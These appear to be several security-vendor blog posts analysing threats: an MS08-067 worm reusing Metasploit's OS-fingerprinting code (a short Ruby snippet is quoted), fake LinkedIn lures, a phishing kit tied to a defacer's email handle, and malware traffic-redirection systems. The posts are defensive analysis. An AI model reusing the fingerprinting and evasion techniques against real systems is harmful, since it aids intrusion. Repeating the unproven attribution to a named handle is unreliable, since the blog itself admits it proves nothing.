The latest metasploit exploit, besides including Windows XP/2003 OS’s; also includes several targets for languages such as English, Arabic, Czech, Danish, German, Greek Spanish Finnish, French, Hebrew, Japanese, Chinese, etc. The exploit module of ms08_067_netapi in metasploit also provides the “smb_fingerprint()” function to detect the Windows version information, Service Pack information and also the language information of the target OS. This makes programming the worm much easier and can cause much bigger impact. By using the exploit from the metasploit module as the code base, a virus/worm programmer only needs to implement functions for automatic downloading and spreading. We believe that this can be accomplished by an average programmer who understands the basics of exploitation and has decent programming skills. After further analysis of the traffic capture, we found that only the functions for detecting OS version and Service Pack information were embedded into this worm. Hence without the remote OS language determination ‘feature’, this worm only targets the English OS versions at the time of writing the blog.

Here is a packet capture snippet used in this malware to detect the OS version and Service Pack information:

By sending SMB session setup and request, it can detect OS information of target machine. If the OS is Windows Server 2003, then the Service Pack information will also be returned.

Since there are a huge number of Windows XP systems it’s obvious that the worm writer did not want to miss out on this pool, hence this is why the worm determines what the Service Pack level is by accessing \SRVSVC named pipe, which is similar to the method used in metasploit smb_fingerprint() function :

if (os == 'Windows XP' and sp.length == 0)
            # SRVSVC was blocked in SP2
            begin
                         smb_create("\\SRVSVC")
                         sp = 'Service Pack 0 / 1'
            rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
                         if (e.error_code == 0xc0000022)
                                 sp = 'Service Pack 2+'
                         end
            end
end

So in this instance it’s obvious that malware/worm writers are abusing open source tools to their advantage to make their work easier.

For those who haven’t patched their machines, we suggest you install the MS08-067 patch ASAP! If you are a McAfee Host IPS or Network IPS user, we’ve verified that you are protected against this worm by our Signatures ID’s 3961 and 0×40709d00 respectively. For VirusScan users, the DAT update version 5444 has coverage to detect this worm.

Today we at McAfee Avert Labs released the first of our new monthly publications: the “McAfee January Spam Report.”

Within its pages you will find excellent information on current spam trends, campaigns, and maybe even some “winners and losers.” Some of the highlights of the January issue include:

Political Spam
Tax Relief Junk Mail
Unemployment and Diploma Spam Increases
Christmas E-Cards

As well as some 2009 spam predictions! Definitely worth the download and read. Watch for our February issue in about four weeks. All spam reports, as well as other white papers, are available from our whitepaper download area here.

LinkedIn is a popular social networking site where you can manage business contacts online. Since you can set up a profile with links to your own website, it seems to attract criminals’ attention as well. A Google search reveals that several hundred fake LinkedIn profiles from nude “Kirsten Dunst” to nude “Hulk Hogan” exist already. The rogue profiles look all alike, with a picture of the celebrity and three links to the parts of the “nude video” like shown in the following picture.

This is exactly the lure – don’t follow these links! The linked websites contain obfuscated script code which decodes to a simple browser redirection. This obfuscated script code is proactively detected by McAfee as “Exploit-IFrame.gen.c” already.

If you’d follow the link (don’t do that!) to see how deep the rabbit hole goes, you will end up with a Traffic Management System like described in this Avert Labs blog entry. On every reload the server-side application will point to a different domain.

So when an unsuspecting user gets tricked to follow the lure, he will end up on different malicious websites trying the classical social-engineering tricks of either the “missing video codec” or of showing a fake AV scan and telling that the user his computer was infected with malware and offering a “free” AV scanner software, which in fact is the real threat. So beware when following links, even on trusted Web 2.0 platforms like LinkedIn. Especially when they promise some nude celebrity videos.

The current crisis in Gaza between Palestinians and Israelis marks a renewal of web defacement activities. Various Morocco hacker groups have been pointed out by the press; the best known is “Team-Evil,” which just hacked the Ynet Israeli news site.

This weekend, I read various French posts speaking about ethical hacking and “e-jihad” operations made by “pacifist hackers” motivated only by their political ideology. However, reality is sometimes different from perception, and one hacker may conceal another.

On New Year’s Day various web sites were hacked by people introducing themselves as “Morocco & Gaza Hackers” or the “Team Cruel Boys” group.

On the defaced page, one attacker–whose email address is m0×0m_at_hotmail.fr–introduced himself as “M. SoOoSo.” His message seems clear: “I’m not a saboteur, and I didn’t hack this site as an act of sabotage.” At first glance, this guy could gain some sympathizers of the Palestinians’ cause.

But the story is not so simple. A week before, on Christmas Day, I heard about a phishing attack against Orange.fr, a French Internet Provider. Using a mirror site, hackers tried to intercept user names and passwords to access emails and personal data.

Speaking with the discoverers of this identity theft attempt and looking at the code, I noted the stolen data were sent to the same m0×0m email address. Moreover, the PHP script was named soooso.php. What a curious coincidence!

A second email address pointed to another possible Moroccan. As result of some searches I made today, I would not be surprised if this second guy (if it is not the same as the first) was also involved in some fake auction operations.

Of course I can prove nothing, but it would not be the first time we have heard hackers claiming to be ethical “white hats” who are really engaged in criminal activities.

The Web’s classical social-engineering trick of the “missing video codec” tries to lure people into clicking on links or download and install an executable which pretends to be the missing application which is needed in order to watch the movie. The animated picture below is such an example: at first glance, it looks like a typically embedded video which is unable to load. The “picture” states that you’d have to click on it in order to see the movie. And here the lure begins – in this blog entry, we’ll follow it down and outline what kind of traffic management backbones are deployed for malware campaigns nowadays.

In our example the animated image is hosted on a popular blog platform and the link points to a suspicious Flash sample. As a quick analysis reveals, the Flash is compressed and additionally contains some obfuscated JavaScript code to hide its real intention. The script code redirects to another location.

The new location points to a so-called “Traffic Management System”. In this case, if you load the URL several times, the destination rotates and after too many retries you will be always redirected to the homepage of Google. The system remembers your IP address on the server-side for a certain time period. After that time, or when you just use another IP address, you will again see the redirections when visiting the URL.

The redirections are based on a typical HTTP “302 Found” response with a new location from the server where the traffic management system is installed. Another example, which also used Geo-Location, was outlined in this Avert Labs Blog post where a downloader trojan contacted such a system and based on the country, different malware binaries were downloaded.

Such traffic management systems nowadays are configured via web-based administration interfaces. Typically the links for the “incoming traffic” look like http://www.example.com/in.cgi?three or http://www.example.com/in.cgi?default where “three” or “default” stands for different campaign IDs inside the system. A typical rule could look like shown in the following picture.

The administrator is able to define rules for “incoming traffic” which results in different “outgoing traffic” based on different restrictions. For example, the Geo-Location could be used to redirect visitors from a particular country to one location while visitors from another country will be redirected to a different location – just think of localized campaigns targeted to the spoken language in these countries. So users from the United States will not be redirected to a french phishing web site and vice versa.

These traffic management systems can also use more complex rules based on network ranges and the referrer – so lets say that only visitors with a referer from Google will be redirected to a malicious web site as long as the IP address of the visitor doesn’t come from well-known network ranges belonging to security companies.

Why do that? This way, only users searching for the website will get to the malicious redirect, while the websites’ owner or administrator, who usually does not search for it but directly enters the URL into the browser, will see the normal website with no oddities. This helps the attacker to keep the infection under the radar for a longer time.

Other trafic management systems, like shown in the above picture, also feature different logins into the web interface – for the administrator, the “sellers” and the “buyers”. This particular system has different views for sellers of traffic – that is, infected web sites containing an IFRAME that points to the trafic management system -, and buyers of traffic – e.g. the people who run exploit servers and try to install malware on unpatched computers, thus looking for potential victims. Such traffic management systems can be in between the infected web sites and the exploit servers. As you can see in the above picture also payment options can be configured, so the more traffic a seller redirects to a buyer, the more money is paid. With such systems in between, the campaigns can be easily exchanged or the “traffic” can be sold to new buyers which try to install their malware.

So the classical starter, the “missing video codec” trick, can end up in quite a complex system managing modern malware campaigns. Visiting or following a malicious ressource nowadays means that you are redirected based on a complex server-side management system.